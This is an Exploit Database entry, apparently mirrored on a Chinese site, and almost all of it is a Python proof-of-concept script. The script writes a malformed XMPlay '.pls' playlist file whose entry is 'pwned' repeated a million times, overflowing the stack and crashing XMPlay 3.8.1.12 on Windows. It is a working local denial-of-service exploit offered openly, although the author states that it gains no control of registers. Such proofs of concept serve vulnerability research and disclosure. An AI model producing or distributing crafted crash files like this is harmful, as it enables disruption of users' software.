XMPlay 3.8.1.12 – ‘.pls’ Local Crash (PoC)

• Exploit Database
• 19 阅读

• 作者： St0rn
  日期： 2015-08-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37798/

• #!/usr/bin/env python
  #
  # Exploit Title: XMPlay .pls Local Crash poc
  # Date: 2015-08-16
  # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
  # Twitter: st0rnpentest
  #
  # Vendor Homepage: http://www.un4seen.com/
  # Software Link: http://www.un4seen.com/download.php?xmplay38
  # Version: 3.8.1.12
  # Tested on: Windows 7
  #
  
  
  # Stack Overflowing xmplay, but we can't 
  # rewrite any register ou SE Handler
  
  def generateCrash():
   crash="""
  numberofentries=1
  file1="""
  
   crash+="pwned"*1000000
   return crash
  
  
  
  try:
   f=open("xmplay.pls","w")
   f.write(generateCrash())
   f.close
   print "Evil xmplay.pls generated!"
  except:
   print "I can't create file :/"